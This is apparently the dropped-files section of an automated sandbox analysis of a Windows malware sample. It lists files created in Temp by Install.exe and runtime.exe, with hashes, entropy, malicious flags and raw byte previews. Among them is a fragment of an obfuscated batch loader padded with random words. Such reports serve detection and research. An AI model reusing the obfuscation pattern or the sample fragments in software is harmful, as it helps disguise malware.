Preview:	.$..Af.`....n.v...o/ .7...,io.z.=.........h.O(1E...g.Mg.(..l..m.g.{rW.K.. .=...A.. ...3Y a..G.6.)..ZkS.jC....P..q..XJ....,bI...h......7C.).lg<..v.7mj....V.:..\|G.bBf....goG..m.DC.d....6{.u..@e<..I/4?.h:.?.I.{.s.....d...q.Q...;.....Q-?...8......`....^....:(.E3..]z.Y/....E............H..l.({....Is......B'...`..W.i.....$..8..Xs.....4..jS.Jr<.0...;..j`......bm&...d^&...O.b.>..//.g.k.....Rj.....y....46&..z.........He...fVf\QE,....+...........{I.B......p.....+.....t?..3..#.....,.v...s.aG\|..a..@..O.eR.~.Kt.=,/...._./....tQg$....J..c............r..mI.k...=m..5#.~a.. `..5.i.B...iz.......".q...Xe5..:{...i~8\|Z2QW..5p..h.M3...+..P.'...>...R./J...jgM$[Hbj...h.Fh...f..O.2Qz..m_.&....#....N.H.G..Z...=8...s.....eHon{.E~x..!...k..H.J.Mh....>....+.,...!^.5...k0.(W...(.$....!f..Zz.d.Q..2......I.....C.-...p....5....,.8W..D..f.v4...q....s.].i<7...I.1.(.3..^.......!.e...l~}.....X...V5.d....F:...<..0..V3.H...D.W....u...4Q.. T..ULNG.\..T.d.+G#9..B....uiZ.!..N..e

C:\Users\user\AppData\Local\Temp\7zSD38E.tmp\Install.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7zSC5C3.tmp\Install.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6984192
Entropy (8bit):	7.769625404677635
Encrypted:	false
SSDEEP:	196608:8BHQB/DJvDD2YxyHx96sbsWX/sD0WlHfvpeRYXqZk+:uHYvZx2dbP0AWlJQYXqZk
MD5:	523C9DF50948340DF2E82213B22C72B7
SHA1:	9260E4AFB910E4F0C98AAD1BF8B9BC31F5D7467F
SHA-256:	26F9EAFB7869A2BFA9AF2EDE0363C2A41AF6839C4263F6C107AB723DE9DD2E37
SHA-512:	28432C1FE74D0F74F3B2EDCE9CDB2A987E170CD19738384CA63BE432108D17D636FC78FC4D55A84B36F7C19EA1999988CD488798064DAEF986784D6EB4E92C32
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:*#.~KM.~KM.~KM.s...`KM.s....KM.s....KM.....uKM.~KL.8JM....xKM.....KM.Rich~KM.........................PE..L...8F.a......................`...................@...........................k......Jk...@...................................j.x.............................j..6....................................i.@.............j..............................text............................... ..`.data....._......._.................@....idata... ....j.."...(j.............@..@.hJL..........j......Jj.............@....reloc...6....j..8...Zj.............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Competent

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	87040
Entropy (8bit):	7.998110498540301
Encrypted:	true
SSDEEP:	1536:2fV6ysLAsot6A5to2ocZ/3QRI6ySIBORLPcV+MJCP7Jay/R0ulyd0g31RQhc:2wycAsa5jvQRIwV9P3MJCToqLycG
MD5:	D79DDDA7E49B51BB69F59808170A5E63
SHA1:	B791857AE7B920D50F2FC97F0895F289C6A9E8BD
SHA-256:	609B33673BA3698DE21D56BCE0A871D9D96269C7D86BC087419610452675A90E
SHA-512:	4F977BA99B3F88D60380F81EFC0B74BBE4AE29573E0E8CAF0F5899E83F29BE895391FF374A0E557B5BE4EECD241829A442C92FA72F5DDDCB440A45CC4356A157
Malicious:	true
Preview:	K..J...vz..I`..i....D..t.....k7...W.9..r.a.z.\......_..........v.w.Y........'\|.....$...!}.E..er.I.F.#5UA...B7S!u\../R.iU@.TsF.....WJ_6.Kd.f.B}.)t.KqBG0..?.....?&9;...%..o.x...v.P.&+n.5j..^..D.-..%@.w.}..}..?..q.../.>G.S..~..a..U.O...yJ..b..E.%X...../P).....UN".,&..j..%4....o.........zZ.......y,..? ..+.!5S......Q. ..n;........Zw..l...`..r'?..\|.'..Y.J...k..B.zW..no..Rk."....\|.!..N..X h....Gn...A...FRA.\M..@... 1d....N.G.....EPq......i...yX..-&=.........m......G......U.......Qp...WC .0...L..h.q.....k.{.R.....l._oLL..p[....QL5..}.%K.F....K...#$Q,..n.=..\b.3.u:#p..g.ju...,~-'.n..F=...N.%....@/...K.L..r..]S./;.....oQ..a.......-s.`.gB..A....R.SJ...bO<..&\|_..VZ...d(>.2..P.f. <z....H$...Nd(....!\...R.f...[#..Z{e..@j...G.c1...]MX..?..I.:...@.3I&......E..k.5.....E.t;....0.O..\/.L-c....R..\|...jE!....z,.....kM..m.8.!.......j......iS.q.<...CB;].wY2...4Q3.2.-....]:ih....'..c..V..ht.... >?I. .J...C].l...8F..r{S.'..N).P.s.>.......b....Y.6G.P#........

C:\Users\user\AppData\Local\Temp\Corporate

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	66560
Entropy (8bit):	7.997049155940351
Encrypted:	true
SSDEEP:	768:EFzQqu3JDyFgqUKY0iJ+m7L/Z+67tnwlmxbJYMzwExLG//rxJrjRmq2Q04SMtO9O:JegqUKYyiL/Z+6ZwQz38ExUVJ8ZpLw
MD5:	57B8AB1323416077ED8BB346DD2DAA09
SHA1:	43116DAE9716CAF4E7F43943A89E357204C842F8
SHA-256:	1A8D43ECF42D62C9F4DFDAD24C25136A028760A19CF4FD27336BFBB0962426B9
SHA-512:	1899D8CE43C0E18FF3D7EA833680921A717D098FD2C4F8F5DED7007AA31F9946D6895F65364B17BA7DA2F77AFA5EF3782EEFCE562314776BC7FC8B5CB45B1F37
Malicious:	true
Preview:	.,..I<.......b.F.xt......f...jS9..S.e!H...h.:..H.h.......e..h..q....+k....n.?..(..G........e...6..uH\|.d.[.}....B=...y.b.e..o.~e.B.z..............D.a..k...'..:y...^...2.C..6#..Q......U..p..C!.:O..f.V.pG.X /...%"..$...B?.wx.]..8.c...4.\|.BC\`..;.'.iH...P....@.n'....(..w.d.....;..VV..5X...NV..z..'...X...D`.....L..K.{T..~.."..~'.......G/.+...9.BNT.\S..k...%98r....2.@`a....T..1.#f..SY.......;.tL..$pL...D.C..E.....]..s#G(.".'..5...$.\|..px...m4..ij...8xy..&.2...[HS...@.?p6...%:.4#...[.....#%..q..Z$.... om..#.6..=..z4...~;f........(me..y.K.9SF%..n.Ug.......)!jA7.H..8.z....].j.."9...d........s..Sr..."..?.\|QB....F....f.F.d:......$..(.....S.>.C;......Q^iOj.5..}.......Q.i.:RB..8O.H.w..[..!w...}...j...a6.q..+%h[n..mY..5...m~....6..,Q.[.5h.T..K..7LX.a....P...3..a.?.Hq..?....A~4I.\|.,...../...c....+......>M.C..m.\|.$..\|..T.h.s`cc..pi..;.....\.E..".U. .B.\1....ir.N.}...Ob'....f..P..'....X.,.U-...G.60K.....p&F...h7/.H........SQ9.W8......f.@..,.`....P3..

C:\Users\user\AppData\Local\Temp\Entrepreneurs

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	7.997973981352657
Encrypted:	true
SSDEEP:	1536:rIMLTZUD1zCXWdOfnDci2EvLSaB6SPY4DvNn9pEbRJu/dIKRFA6:rI89URzCGqnDrxv23+XD1E9s3Re6
MD5:	1C78EAD3742C95A2C4DF31C8D71E0F1B
SHA1:	A075CCA4D9D8FA5FE3DDBF1F2D6E120208CB5B17
SHA-256:	B25E0F67C38257DBC0AB9A7D6AF8870C878211ABD4E51B8DB52D9C3E2272652D
SHA-512:	09A234D52B31B38A4071078ABDC9A976AA58716A7BA9F1832B84966F039B621044EAAA641FDB2C919FE5334902E4DBAA8E3FD19A638583120F881CDE218B9112
Malicious:	true
Preview:	.._M.......ii.W.X..."2.~#?........-=..l^./....k..%....y.....5k.m.T.n!.....\.[...z...%s7..c.....t....}.UF.x.yHp/s....P8.~...k.%ZpX/o$~e.....=..c..&...f...m....Z...^.....5.}&...v..$./S.y\|.....J.$uJ..<!x..9HW..iS..~...CL!+..F4..G\|r..>f........n.._GZ.^...w..I..y..v.....@.;.c.-3...J;..u..w....\|...2[.C.&'@5>.].)-..D.....]..zT.&.X.....L......?<..D.4...n.V..>.a.$..... .}....SU......_r.'.Y.4y..b.n.8......H..d.n.)....F..p'..W.u&..\|.{E.^_......w]m...yi.\|..R..tS....S......ZR:.v.5...1.....zp.....,..S.OT'A.e.v..."...)"^.g..TK.#t...V...S....Q...3.z.....Yb%r..\]..4..{QhN..?g.2..e...n...T)&..o......qs....[.;U}]..GU......y}..kn..e...SE.ker..8....]......k.\.Eqxu.....J.k...v.7.......].t...a/....l5.N_.m.&..l...HB.Iz,.m..j=.,.#....}..TO.3;...d..Mg...6.O..g.q..w=.z.q<...._Ebk.F...0......s.D.....c.?.Z.... ..$w..)....&..u[w.=......}j?!a.....[..q.*Gh..8...V....~.....P.......dS.P.......nwM,\|.7Q..q.X...E..nE.p(.b.[I...L..Q.>b.."...8Qx/....1...$.cR........v..."p

C:\Users\user\AppData\Local\Temp\Greatest

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	100352
Entropy (8bit):	7.997940176517337
Encrypted:	true
SSDEEP:	1536:rh9fG5c8ghh85Az6ZgnXdrZ4QD9hZtBCyV8qmRfQQ1BXclmgWnS3lpvaww210:bZh85ynXdrPJhQj5X1BIB2SVpvawT6
MD5:	043E35E2330184D548101DFDB638BE96
SHA1:	F73E6F2AF1052B4810820C68F9693E90F6A07D6D
SHA-256:	2D081C4A75403C808336CD690598E765D1277CEA32E3CEA2CB7BC0E62AD35C77
SHA-512:	D764704F01B91644DF122C4EFF4DBA404A46BC436C45F5406509E509213306A0CDED57CBBECA20A6B474C656C294A91E2EA16025B267AF34F4760FC02A8D69C5
Malicious:	true
Preview:	.9".ax^]......`.?...W.........9....o...}>....p.n.=..ge..6..VF.p.P=..?l...j.....M..F../........z..T<.TmWup..A0Yd...W..O.8...D%.S.'\j..(.-...2wpw$.K...d~.0........c~.(.@.......P...]..T.WKf-.8a....%.r+.y...U0.FP@.k............r?......04Y.{8.yG.H.Vi.d%..=a....aM..j..ZH.3.. ..%..k%.....69......O.._.8.)z....Z....b0&..E2....\Z..G.m.....n.NB..Q.H.Th.....e...{...)...H.b.<{\|.o.....A(...../.m;..t.j...<L(.XL...m.. ...R.VA'../?....HF.g...Z.\|...]...D1...8t.W..T........i..}.z...h$.XF~8n+..6....N......T.X./...l#...z.N...q..8.A...!...&>.Ur..{.......k....K...........c_.&.C.(f-.\|F2..ap...~.O.........b...BJ6...9,.9W...}...8...]..U..$.9.....@...@NV..>.[p;T..$.l`_a..k....e..?z...Z./../.g..B./..H..z...(......F.G....n...k L"b#W...!.I..;.F.B.r..1.qY2..c.e......P...W,....&.T.xj..0k.W...4....v...G.".N:....2t.R'[...Y.n!.m[_..A%...-...tV..5...K.K ..Xb......D\|.1.E....5.G...b......Z...e.......<{.......55....j...Ga,.g..)...........Z.HD%v......=..A.ys..

C:\Users\user\AppData\Local\Temp\Honda

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	ASCII text, with very long lines (574), with CRLF line terminators
Category:	dropped
Size (bytes):	12305
Entropy (8bit):	5.0949681487880785
Encrypted:	false
SSDEEP:	384:5xhQAQODXaKbsPsE7B7lZstjTicMXKtVt:TJQODXa4MBrUGXKtb
MD5:	CEF464062B7E5B404539D0C443917907
SHA1:	01802C968D8917FAB13D71BFE4ED62E36E965745
SHA-256:	5C1046EA8E740FAAAF01E2818EBF5CEA15D398594A26B8BB76E8B3DA6DBD1BBA
SHA-512:	A5E335A7BE3BC40B5DD30E40813BAE8CD51761C2BFB8D4E2B6AD067CF8DD429AEC85AD70534780DE6D8FA8E996F310FB3D73334C83EB6EC92816C497C303E6B5
Malicious:	false
Preview:	Set Ks=o..HKGlobal Michael Jane ..sxUIncome Moms Affiliated Educated Controversial Habits Slot Insurance April ..jfTManually ..KLhSuspended Housing Screening ..gJyyLightning Marks Raises Functional Diet Indigenous ..pnUnavailable Gi ..nIGrey General Furniture Agencies ..KFuIAdoption ..Set Scholar=p..AgSharon Lynn Accept Lived Underground Orange Milf ..djBStill Specializing Walnut ..zURelying Baking Podcasts ..WELoFifth Understood Inspiration Pound ..IkWTaken Interested Reset Shares Nudist Picture ..tPPArbitrary Pierre Tabs ..Set Butt=g..HuLTt ..nuGenerates ..RJlFInstitute ..cCWActive Factors Sticks Sept Told ..zJesBlvd Accommodation Bit Converted Necessary ..jfJCPromising Default Boxes ..Set Nylon=v..lxPatrol Notify Component Burning Grave Crew Cad ..CMExists Impossible Fri Mpeg ..ARManor Companies Diving Discs Trouble Ray Originally Objects ..fhznOutdoor Sophisticated Knowledgestorm Singles Weight Shorter Gardens ..WMWiDirectories Surround Logo Holds Caused Complete Film Staffing Link

C:\Users\user\AppData\Local\Temp\Honda.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (574), with CRLF line terminators
Category:	dropped
Size (bytes):	12305
Entropy (8bit):	5.0949681487880785
Encrypted:	false
SSDEEP:	384:5xhQAQODXaKbsPsE7B7lZstjTicMXKtVt:TJQODXa4MBrUGXKtb
MD5:	CEF464062B7E5B404539D0C443917907
SHA1:	01802C968D8917FAB13D71BFE4ED62E36E965745
SHA-256:	5C1046EA8E740FAAAF01E2818EBF5CEA15D398594A26B8BB76E8B3DA6DBD1BBA
SHA-512:	A5E335A7BE3BC40B5DD30E40813BAE8CD51761C2BFB8D4E2B6AD067CF8DD429AEC85AD70534780DE6D8FA8E996F310FB3D73334C83EB6EC92816C497C303E6B5
Malicious:	false
Preview:	Set Ks=o..HKGlobal Michael Jane ..sxUIncome Moms Affiliated Educated Controversial Habits Slot Insurance April ..jfTManually ..KLhSuspended Housing Screening ..gJyyLightning Marks Raises Functional Diet Indigenous ..pnUnavailable Gi ..nIGrey General Furniture Agencies ..KFuIAdoption ..Set Scholar=p..AgSharon Lynn Accept Lived Underground Orange Milf ..djBStill Specializing Walnut ..zURelying Baking Podcasts ..WELoFifth Understood Inspiration Pound ..IkWTaken Interested Reset Shares Nudist Picture ..tPPArbitrary Pierre Tabs ..Set Butt=g..HuLTt ..nuGenerates ..RJlFInstitute ..cCWActive Factors Sticks Sept Told ..zJesBlvd Accommodation Bit Converted Necessary ..jfJCPromising Default Boxes ..Set Nylon=v..lxPatrol Notify Component Burning Grave Crew Cad ..CMExists Impossible Fri Mpeg ..ARManor Companies Diving Discs Trouble Ray Originally Objects ..fhznOutdoor Sophisticated Knowledgestorm Singles Weight Shorter Gardens ..WMWiDirectories Surround Logo Holds Caused Complete Film Staffing Link

C:\Users\user\AppData\Local\Temp\Itsa

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	868
Entropy (8bit):	3.5548026049869303
Encrypted:	false
SSDEEP:	12:OyGSGCbTQxbs/0pQHPZdsLq6h1b5zGbWCBl9dte4:OyGSnPQxqtPMLqCj8WCBl9dte4
MD5:	20CA365E882B4C4A95B110E62F8A4C08
SHA1:	662E9B589D89DE106713F361D8B2536740554785
SHA-256:	2739A9B72A38C08A6385701C6BAFEB7FDD7FAE8B33ACE80732EC934EC8518C6C
SHA-512:	9682A8935932673B2C1C5FDA831C5B1E53219DBD74DBF96E483CDEC68DB6B31A69D714F6257C62A708BF0B6A2773F5F01EFC86CB54FCC084341A862ED6E4D6FB
Malicious:	false
Preview:	BachelorRayPotentialBeats..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B.................................................................................................................

C:\Users\user\AppData\Local\Temp\Provides

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	81920
Entropy (8bit):	7.997608168843038
Encrypted:	true
SSDEEP:	1536:YTpO3XWfDyw7a9utGvuEpqKw7NmLFd6oQbQbsbLvisrIl/xbH48kVGboiW:YPfOwOutGGEpqd7Gd6/bQbILv5rC/xL6
MD5:	72DCAD57E5699DC20CB41F6AE4ACD115
SHA1:	CB7E6842F24319262605EA2C1BF3A7EAE60358AF
SHA-256:	945D570376B997851FD74131BCF117AAD625341FCB7B756409E7CB711632CB0C
SHA-512:	5F251F25514D5D138D20B308C2C162DAF9520DDE28F25379D09ACAF1F2FC67BCF9A3BFA62A42D83C19FEBFD28809E82561AA2B19614735037930964D1AA18AFD
Malicious:	true
Preview:	/..a..."x.9....7M..-.Pf.GS.nR. ...]?.qI...!...(..i}.......-....$c^.{........d...yZw=:...^D....SA..s.o...y.A...G...].k.#..p......5]......,Q..w....n{.7...T...).,1.O_`...[...R^ W..3...+.....U.f$...2g............Z<...jD.J..d.C..<..t#8.Go....$...{.I .f\.........P[.0..ad.}... P......!do.y..M.[].Z`~....{&...&...}.f..Y........+9!.".^GE4"BH...=.O...~k...s}\|.A.'0.>.....c=.p.X..8...;0....q.WQ..^y.A.....F8.`^Y...Z.....2.x.p.8e..UD...b...<..V..;"............_..S.hP4....v.<L.Z....mi7.. ..o..".\|. ....{1H.+S.....F.r..I...#..L..>_..M..@..H`...@.N#..z..Z.....J......H.2f...%._Smv.p.......,-.ef8......=...+./~.\|......).....=..M"...._>.Z.......y.l.h...6..#.'.N9.-...B..OG.<..:k....'.#Q....mV].Rf."9".._jm.....?.cX.........E}......g.n.....e..(...UU..8@),...n.bj, .u......ew\|.;/..R.l..u;......\|.U'\....=.o.p_..$..b..=.../a.Uv7M...p..~`.X...C.G....Ljs.s.;...y..M.:..lUi.d..,.Kk.(..Cq.V......."Q.^.W..V...v.;._Sg\Y:..........)Y.Z..cC-.......~.....o...3.>E7..D.@2.&JV.

C:\Users\user\AppData\Local\Temp\Reveal

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	7.997896408510753
Encrypted:	true
SSDEEP:	1536:L1lLilX3YfWBMdU67iXs7D2VtQZzraEA4cA19fx0+bnGiI6CJBKA/7J/fR3Wg:LXuVYwMdU6Vu8zLbcAjffzvITBfR
MD5:	D6A091E43DB1334C92A9163FB999AA13
SHA1:	380674ED8D23C1EC2F9A5F5B0167970B296772A7
SHA-256:	2299A0DF735B5C6A171DDD6A1B009756C19EC3BB1383BEF34BCA8FA7F4A6CF09
SHA-512:	4142FC9995B083BC2D3D9B5C2789EA564117ED0EDE14A1AA510E9B32B8FDCD149350CE8069EC168141E720D4FFAA246BC7A4585FDFF4466343CA3F4D206719F8
Malicious:	true
Preview:	..t.^.% ...s...6..^.WIB.d.."..q.....;;N....tS....U..4.rI..L....V....%#{.?....'.....e...5.....Z../...d!U..q.H.3R.].lJr......I.q...j..(a..H.T].k.....Bc...+.*..@A>..../@..@2..,D.......a......]IG,.S......S.\|-$.\..0[.'.'...p'....y..ZhD.......X....'....e..8........'..1e.1.h...3!..@?.P.Lz.t.(..I..........N.....Q%..........l.............^B.~5)u.Z.A.=zO....8.M...s..5....~z.z..[..f.......R...+}.?.p...K.S.Y.%...E^+`..e.U..9.(.....c4Y.+.....?...=.W.....]m..O.R.....Vx.k...<.N,[...i:]...c.....bA7.....N..."....;.h.om?...>..]..G>./$..>....1?.M_4D..Z.@ykX!.A.`7..rxs$..Vr..T..4-....F.H...6@\.k...^;Ie..........R..\|...Z...>.0.k6gDD..%...............u......H..m.`......c.6....;<z..N.m..#..;5..5m>..:.)...m.E........J.FyK{@`.}^o.O..^....g.j./.w..>.~..1.=^.lQ5.LR.l.U.[+.\|2E.Fc.njaVW.3..-?.JW.......t>Z.X3.K.a...@.....X..59..v.^....L..J5$.,.e.LA9.`.=.{V..X. .....$.....(...C...c.djF....'.....TNp...5]$'..?H.(j68.c;T....Ro..$>..E..w.D..-.@...}..%.6w.

C:\Users\user\AppData\Local\Temp\Scottish

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	892767
Entropy (8bit):	6.621907056901829
Encrypted:	false
SSDEEP:	12288:vpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:vTxz1JMyyzlohMf1tN70aw8501
MD5:	EA1CFAD1B98DA498ADDAD255609D0E5F
SHA1:	14FA7E96806624330A8899B215550122AEB94C91
SHA-256:	DA224EA0C81FD05189621037F4F0B856F47DD1FB0841D4142395F638DA7EB802
SHA-512:	EDE7FA0FC6922366DD7319BDC0A00AF36B39D506EE246A18D66641374A04727318ABDC8832944995C4374487515B38017A081FFBFA17F566B1C83FAC59E39442
Malicious:	false
Preview:	........................................................................................................................................................................................DaL.....h..C..\...Y...L..h..C..K...Y..N..h..C..:...Y.h..C......Y..<C..h..C......Y.....h..C......Y.Q.>...h..C......Y..sL.Q.@...sL.P.9...h.C......Y..G..h.C......Y...(..h.C.....Y..4..h.C.....Y...L..2...h.C.....Y................SVW..j.[..l............Ky.Nl.....N(....V.;...Y_..^[...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd....j....................F\|U............[...U......Ky......3........................l.....p.....t.....x.....\|...........................f.............................................................._......^[.U..QQ.E....I.Pj.hD.I..............f.}.1.....].U..QQ.}..SVtr.u...tk3.3.f...E.Pj.SRQ....I...uQ.E.W.<..E..}.PVSS.u..u... .I...u..E...E.;E.s.3.f..F...u.....I..._^[..].3.f.D7...2...U..SV..j.[.F.9F.u0...j.X;.sL3.F...W......

C:\Users\user\AppData\Local\Temp\Screw

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	7.997177526469974
Encrypted:	true
SSDEEP:	1536:YyWwUSme91qs+wl3fncHWq54NBb1ImVq80aoQXsmoRwmYEa+xRHoBgW:nPdxqsH302q547xImVq80jRnyWugW
MD5:	5FC7641883018EDBF0EAD49AF5EC3CBC
SHA1:	B021E03764AA36D5B5176AB9DBD825001D9797C8
SHA-256:	419E973C6E735BBA8B60704A962E0B79D285E7A09CB317AEFAB1ED001A1BF344
SHA-512:	698C1EE8137077116160E8958DAABED29DA1BFC2C9CE9795A5242FBD8A61FD2D425AA5722542D60F8DF15C2AF19A3ECB4A7D3628C9FDBF40F46A37769647EADE
Malicious:	true
Preview:	...A.x.1..y.d.RBw?...\.t.4.t4.M..0..#.}._.!LF.W..".0v>..g._w=;.W+.y.,_]..=....w.W...b...Q.C...........&.Gl..`L...@'...u...6......XM.T8w@.1....wd.=...o..7..gz.Hr....y.._.4o.I.j..uzi..8y1)..-....iR..'tX...B...rx...>.q..K...1......CP.....:...#.Z..<.}. )..%..!......r..>.4S%o..a....O.i....>W.;.r7.+........>.......R.........K(LA/./../P+..GF0..lJ...R.81...#e..V......>.H....P.....V...;0...\...GQ..D.h.d.}.:..r.h-1..@..R.....U\|.W....MjK....ah.u..E.sm.........m....j....4.t....8........Cm,o..~.f..i.E.1...SNNL.:]..B.....>......O......P.5...S).cz.+....!.1.+.Q....8.)..6...VH..E&...1ro..-T._e.k{.z6Tc...DQ..};.e....^..F.8...a.nd.,u...$*...M.r...." .+..[..x....o.7.-+.#O&v~0..V~.....\....w,.).......Vd.T...d....[A.tV!../..\|...5...L...-+.9X....).;.>.w3.JMI?........f.MDA.#..P.E9..wU..6.k..9.............W...Zr.Jvc..D..,.iX....;h?:%.O67.4E~.i:]2....y..H...Y.....q..x....T.5...T....h.l{.;......Rk..A......5.r.+.%9.}.[B?...a..P[.4..F%....[a...Y2T.r......%w..N...

C:\Users\user\AppData\Local\Temp\Still

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe
File Type:	data
Category:	dropped
Size (bytes):	83968
Entropy (8bit):	7.997706963404338
Encrypted:	true
SSDEEP:	1536:KlyC1ycjURzts3v4p/Kqm36vqVBvybzERtSb+ERRG7XZhY+RCtw6nSWbj:ayCcts3dN6yVZybAL+3RM7XExteWbj
MD5:	5737221E4786A16DB1D00B526A889913
SHA1:	B44EF92D0F12E91E236F96359FA3667C773703AB
SHA-256:	743304691772B7F4B1254B7EC4DEFE408ABD5380C260906FF5D51018CC51C7F4
SHA-512:	0B3219FF89BD5F80AA83682C6193C8F540058262231F343AB11EBCCB7849CF45B1B2850494150522479735304CD255E4BC25C1BD76A42F7482E43A3F60D000EF
Malicious:	true
Preview:	......9.....x.]Ky.D~.7.K.....A._v.7..QG.x.O..{S.........A......%.-L.....1..dQl..Z9.ed.7X?.52<...R.F......&...j>.-........d.m..K3W.@....8........[.w>9L.&1H.qn....\.m.Xr..Z...g'`}.6........7^..Vl).........Af3V..9...0./..+..3.xM....C.......}/5..>......5'...5...@kR?.............p..%.m.%....W...~.......O..k....'.w.4.t....N...%.!9s.P..&.....n.../f...".....A.......:..B..O.\f.i.}.q...H.V.`...c...r/<7-J.X/........._.f............=.......r...R.^>.b.._'.i.phl..V.cR$d.[....E..60iZqx8f.....O....d.0......W..W.&..;...\|....d..$..j?.Rz..\.....h.V.....eO..#Wc...1m...X.].f..R$..L=!.3..I.J+.b{.k .YKLN....#.:v....\.q.2..:..z.].\|o..Ug..c.....#>..^......?BA?."!.}.........z...^..5.h..a..0._.R..K>......:..S".1...T.H7Nduu....yA.8.&@J.Y.>..B3.?.....&..F....5.P.D..&......K...\.<#.p..=.Q.B..]....7...K.T..~A.......H)`.WU...Cc_......3I.0...u.>y...]rK+.u...{.....N..I%.....?....!..Q...3. B.CaO.Xw#".s.~.,.g...c8..Y......e}q?....UO=.........i.\|...p.._.U.d..T..]..mk}.4.xV`..

C:\Users\user\AppData\Local\Temp\TmpDE13.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpDE33.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
